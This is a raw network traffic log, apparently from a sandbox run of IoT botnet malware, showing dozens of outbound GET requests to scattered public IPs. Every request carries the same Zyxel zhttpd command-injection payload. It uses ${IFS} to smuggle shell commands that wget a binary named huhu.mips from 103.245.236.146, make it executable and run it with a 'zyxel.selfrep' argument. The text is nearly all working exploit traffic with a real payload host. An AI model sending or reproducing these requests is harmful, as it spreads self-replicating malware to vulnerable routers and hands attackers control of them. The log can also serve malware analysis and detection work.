                                                  Jan 19, 2024 18:24:08.305628061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7421192.168.2.1335768122.175.183.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305701017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7422192.168.2.1351456115.138.36.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305740118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7423192.168.2.1339538102.121.5.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305763960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7424192.168.2.1334952153.130.29.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305818081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7425192.168.2.135794457.74.91.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305856943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7426192.168.2.134353280.160.25.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305911064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7427192.168.2.1341238103.221.191.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305958986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7428192.168.2.1351928143.73.200.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.305988073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7429192.168.2.134873089.143.45.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306030035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7430192.168.2.13604729.196.235.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306083918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7431192.168.2.135795666.80.64.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306118011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7432192.168.2.134029427.179.190.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306164026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7433192.168.2.1343664122.57.142.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306211948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7434192.168.2.1358756110.123.185.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306245089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7435192.168.2.1343902125.43.68.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306307077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7436192.168.2.135045614.100.240.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306353092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7437192.168.2.1338752147.90.6.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306380033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7438192.168.2.1349038219.49.37.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306418896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7439192.168.2.1360596159.190.70.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306487083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7440192.168.2.1356238192.16.224.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306520939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7441192.168.2.134727464.234.168.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306559086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7442192.168.2.1337678131.192.178.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306587934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7443192.168.2.13356568.136.98.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306646109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7444192.168.2.1341728218.204.211.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306682110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7445192.168.2.133362060.40.58.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306704998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7446192.168.2.1355286175.132.22.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306755066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7447192.168.2.1359516119.149.15.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306895971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7448192.168.2.1340086112.115.141.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306917906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7449192.168.2.133978837.206.61.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306936979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7450192.168.2.1350394206.163.36.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.306991100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7451192.168.2.1337740193.23.203.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307029009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7452192.168.2.1348680134.63.133.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307090044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7453192.168.2.1360768192.39.132.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307121038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7454192.168.2.133897052.163.213.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307149887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7455192.168.2.1334148200.85.254.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307187080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7456192.168.2.1357266178.148.248.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307236910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7457192.168.2.1347068159.58.175.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307297945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7458192.168.2.135460487.71.135.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307331085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7459192.168.2.1352632128.175.71.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307374954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7460192.168.2.1354342181.174.79.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307432890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7461192.168.2.133278218.181.236.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307461977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7462192.168.2.1358234139.2.65.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307493925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7463192.168.2.1336088208.65.245.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307560921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7464192.168.2.135289439.179.17.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307585001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7465192.168.2.133519491.186.144.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307637930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7466192.168.2.1343324175.151.198.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307672977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7467192.168.2.133926425.249.144.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307728052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7468192.168.2.133981285.76.171.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307764053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7469192.168.2.133453434.169.53.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307805061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7470192.168.2.135799440.244.253.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307837009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7471192.168.2.134222685.33.119.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307892084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7472192.168.2.135526249.35.225.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307917118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7473192.168.2.135991643.54.159.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307950974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7474192.168.2.1357626183.61.194.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.307990074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7475192.168.2.1345452167.19.70.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308036089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7476192.168.2.1345892108.137.185.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308083057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7477192.168.2.1333862150.136.158.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308139086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7478192.168.2.135714823.93.61.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308181047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7479192.168.2.1348686175.69.79.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308228016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7480192.168.2.1337888222.186.196.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308269024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7481192.168.2.136047085.123.159.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308319092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7482192.168.2.135163819.108.112.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308367014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7483192.168.2.133496874.147.46.61443
                                                  TimestampBytes transferredDirectionData
